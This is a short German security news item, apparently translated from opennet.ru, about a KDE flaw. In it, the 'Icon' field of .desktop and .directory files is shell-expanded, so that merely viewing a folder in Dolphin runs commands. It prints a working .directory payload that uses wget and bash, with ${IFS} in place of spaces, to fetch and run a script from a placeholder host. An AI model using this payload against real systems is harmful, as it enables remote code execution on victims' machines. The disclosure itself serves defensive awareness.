In KDE , die es einem Angreifer ermöglicht, beliebige Befehle auszuführen, wenn ein Benutzer ein Verzeichnis oder Archiv anzeigt, das speziell gestaltete „.desktop“- und „.directory“-Dateien enthält. Ein Angriff erfordert, dass der Benutzer einfach eine Liste von Dateien im Dolphin-Dateimanager anzeigt, eine schädliche Desktop-Datei herunterlädt oder eine Verknüpfung auf den Desktop oder in ein Dokument zieht. Das Problem manifestiert sich in der aktuellen Version der Bibliotheken und ältere Versionen, bis zu KDE 4. Die Sicherheitslücke besteht weiterhin (CVE nicht zugewiesen).
Das Problem wird durch eine falsche Implementierung der KDesktopFile-Klasse verursacht, die bei der Verarbeitung der Variable „Icon“ ohne ordnungsgemäße Escapezeichen den Wert an die Funktion KConfigPrivate::expandString() übergibt, die die Erweiterung von Shell-Sonderzeichen einschließlich der Verarbeitung durchführt die Zeichenfolgen „$(..)“ als auszuführende Befehle. Im Gegensatz zu den Anforderungen der XDG-Spezifikation, Implementierung Shell-Konstrukte werden ohne Trennung der Art der Einstellungen erstellt, d. h. nicht nur bei der Festlegung der Befehlszeile der zu startenden Anwendung, sondern auch bei der Angabe der standardmäßig angezeigten Symbole.
Zum Beispiel, um anzugreifen Senden Sie dem Benutzer ein Zip-Archiv mit einem Verzeichnis, das eine „.directory“-Datei enthält, wie zum Beispiel:
[Desktop-Eintrag] Typ=Verzeichnis
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Wenn Sie versuchen, den Inhalt des Archivs im Dolphin-Dateimanager anzuzeigen, wird das Skript https://example.com/FILENAME.sh heruntergeladen und ausgeführt.
Source: opennet.ru